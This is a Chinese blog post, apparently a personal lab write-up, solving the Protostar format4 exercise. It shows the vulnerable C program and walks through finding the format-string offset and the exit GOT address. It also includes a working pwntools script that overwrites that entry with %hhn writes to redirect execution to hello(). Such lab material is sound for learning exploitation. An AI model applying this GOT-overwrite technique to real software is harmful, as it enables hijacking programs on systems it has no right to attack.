pwn 练习笔记 format4

最新推荐文章于 2022-07-02 15:31:05 发布
最新推荐文章于 2022-07-02 15:31:05 发布
阅读量363 收藏
点赞数
分类专栏: pwn 训练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38783875/article/details/82747980
版权
pwn 同时被 2 个专栏收录
20 篇文章 3 订阅
订阅专栏
训练
13 篇文章 0 订阅
订阅专栏

protostar format4

日常练习,源码为

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);

  exit(1);   
}

int main(int argc, char **argv)
{
  vuln();
}

可以看出printf这里出现了漏洞,这个题的思路就是覆盖exit的地址为函数hello的地址,让程序执行hello函数

1.确定存在格式化串洞的参数是第几个

是第四个参数,把ABCD换成hello函数的地址

2.确定hello函数的地址

hello函数的地址为0x80484b4

替换之后

3.找到exit的调用地址

可以看到 call exit 是跳转到0x80483ec处执行代码,我们用x/i 0x80483ec 查看该地址的内容 

发现是jmp到了0x8049724这个地址,所以只要将0x8049724 这个地址覆盖为hello函数的地址  就可以

代码如下

from pwn import *
 
def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr
 
def fmt_str(offset, size, addr, target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload
 
def main():
    sh = process('./format4')
    payload = fmt_str(4,4,0x8049724,0x80484b4)
    print payload
    sh.sendline(payload)
    print sh.recv()
    sh.interactive()
 
main()

最近破事比较多,学习被耽误啦,还是要多努力啊

SsMing.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn-Format String之hijack GOT
admin的博客
10-07 349
题目来源:ctf-wiki的hijack GOT。 例子 - CTF Wiki (ctf-wiki.org) CTF上的wp有点简洁,复现的时候遇到很多小问题,在这里记录一下。 ①、checksec和IDA 程序的主干代码:没必要一次性看完,下面我们一点一点分析 //main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { signed int v3; // eax cha..
“攻防世界”pwnformat2
qq_42728977的博客
12-11 460
原理: 栈溢出、后门 环境: ubuntu14 工具: pwntools 、IDA 步骤: 查看程序的基本信息: 可以看出程序是32位,斌开了canary和nx 在IDA进行分析查看 看到程序并没有canary的压栈,我当时很奇怪为什么,让你后又看了几个函数,发现也没有,后来看大佬的 WP说是部分函数有,这里的canary是个迷惑。这没有canary就方便很多了。 一点一点看,发现这就是一个...
CTF训练(PWN)——format_secret
weixin_49270591的博客
04-12 454
CTF训练(PWN)——format_secret 这次拿到的是一道pwn题,作为新手只能慢慢学习(啊啊啊啊,pwn是真的难~~) 读题 根据描述,知道是格式化字符串漏洞,于是去度娘了解一下格式化字符串漏洞是什么??? 这里附上来自同站大佬的链接:https://blog.csdn.net/qq_43394612/article/details/84900668 分析题目 首先下载附件 拿到一个意义不明的白色文件 解题 首先使用checksec进行查看 没有的话可以使用git进行安装 git clone
pwn 练习笔记 format2
SsMing的博客
08-16 298
例子是protostar format2 源码为: 和昨天的思路一样,确定要通过格式化字符串洞覆盖target的内容,题目的目的是要让target等于64 1.找到target的地址 2.计算偏移量 先起手个200个 我们发现第四个就是我们的ABCD,所以改一下payload 然后要是target的值为64 ,在括号之前要有64个字符,这里前面已经有34个,还差30个...
攻防世界PWNformat2题解
seaaseesa的博客
11-10 692
format2(整数地址空间溢出) 本题需要细心 首先,检测一下程序保护机制 虽然说开启了CANARY,但是关键的几个函数没有开启这个机制,这道题因为libc库静态链接到文件里,所以才造成这种干扰。 我们用IDA分析一下 后门函数 溢出点在这,memcpy传入的是v4的地址,而v4是int,最多也就8字节,因此这里可以溢出 程序的流程是将我们输入的字符串进行BASE6...
某道Pwn(格式化字符串漏洞)
热门推荐
龙哥盟
03-18 4万+
格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。首先看这一段代码,什么比赛的题我忘了:#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag ==
2018 百越杯 pwn(format WriteUp)
X丶 的博客
12-03 778
看到题目的内容,就知道大概是格式化漏洞了, 马上扔到IDA看个究竟。 不出所料,就是printf的格式化输出漏洞   思路: 1、利用格式化漏洞覆盖任意地址的值,这里我们需要覆盖secret的值,所以先要找到secret的地址,在IDA中,可以看到secret在bss段: 得到secret的地址后,我们就可以对它的值进行覆盖,覆盖成192 2、利用%k$n(k$用于获取格式化...
python强大的字符串格式化函数 - format(四)
xiaoyaozi2020的博客
11-02 78
转自:http://www.weidianyuedu.com/content/5614455282601.html 通过下标 ‘{0[1]}.{0[0]}.{1}’.format([‘pyhtontab’, ‘www’], ‘com’) ‘www.pyhtontab.com’ 有了这些便捷的“映射”方式,我们就有了偷懒利器。基本的python知识告诉我们,list和tuple可以通过“打散”成普通参数给函数,而dict可以打散成关键字参数给函数(通过和*)。所以可以轻松的传个list/tuple
pwn学习-格式化字符串的利用
WocW的博客
03-08 1960
覆盖栈内存 所用例子 /* example/overflow/overflow.c */ #include &lt;stdio.h&gt; int a = 123, b = 456; int main() { int c = 789; char s[100]; printf("%p\n", &amp;c); scanf("%s", s); printf(s); if...
攻防世界-PWN-Format2解题过程
aptx4869_li的博客
07-24 419
# 解题思路 ## 安全机制检查 ``` healer@kali:~/Desktop/format1$ readelf -h format1 ELF Header: Magic: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian ...
python学习(4)--字符串格式化之format()方法
weixin_30547797的博客
10-07 184
一、格式化字符串的函数str.format()增强了字符串格式化的功能。通过{}和:来代替以前的%。 其中format 函数可以接受不限个参数,位置可以不按顺序。 str = "{date}、{filename}、{func_name}、{msg}".format( date = "2018-10-07", ...
PUCCH(7)不同格式的对比特点
tybAly的博客
07-02 2475
扩频仅仅在format1和format4中使用。对于其他的格式没有扩频和解扩的步骤。
格式化字符漏洞 tamuCTF pwn3 writeup
charlie_heng的专栏
06-05 1008
之前一直不怎么会格式化字符串的漏洞,刚好碰上这道题,学习一波首先看下main函数,读一个字符串,然后打印出来,之后直接exit(0) 无法利用栈溢出跳转,但是prinf是直接打印读取的东西,这里就存在一个格式化字符串漏洞。 这里推荐一个格式化字符串漏洞入门的教程: http://codearcana.com/posts/2013/05/02/introduction-to-format-stri
pwn 学习笔记 格式化串计算偏移量
SsMing的博客
08-15 4873
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
Linux pwn入门教程——格式化字符串漏洞
dfdhxb995397的博客
07-18 387
本文作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42943-1-1.html 0×00 printf函数中的漏洞printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 然而,有时候为了省事也会写成 事实上,这是一种非常...
protostar_format4
weixin_30621711的博客
08-08 76
· 这次是要重定向到hello函数,buffer有512长度,但是用了 fgets(buffer,sizeof(buffer),stdin) 这样的输入方式,想要溢出攻击有一些困难(有长度限制啊),至少比之前的用gets函数的难(gets函数什么的,太弱了) hello函数的地址:080484b4 我们注意到了,这里面vuln函数在结束的时候用了exit(1),exit函数是...
C语言-fgets()篇2
编程小菜
11-11 1160
前面写过一篇fgets()从键盘获取数据然后输出到屏幕上,现在用fgets()来将从键盘获得数据然后写入到文件当中,先贴代码。 #include #include #include #define MaxSize 20 #define true 1 void main() { char *proverbs[]= { "Many a mickle makes a muckle.\n",
网络安全系列之培训笔记整理
Nicky's blog
10-25 3287
逻辑漏洞 条件竞争 多个线程竞争同一个共享代码、变量、文件等称之为条件竞争。那么什么情况存在竞争条件? 实例: 上传文件,下面是一个上传文件的例子,上传文件之前先校验权限 #include <stdio.h> #include <unistd.h> #include <string.h> #define DELAY 10000 int main() { ...
格式化字符串_Protostar-format
weixin_45196232的博客
07-26 309
格式化字符串—Protostar-format1-4 Protostar——format1 解题思路: 1.江湖规矩checksec先 发现是32位程序,而且什么都保护都没开。 2.查看程序 在看函数之前我们先运行一下程序看一下是什么效果 发现我们输入什么程序就返回什么给我们(可以多试几次不同的值) 好我们再来main函数,发现main函数里面什么都没有,只是调用了vuln函数,好跟着程序思...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值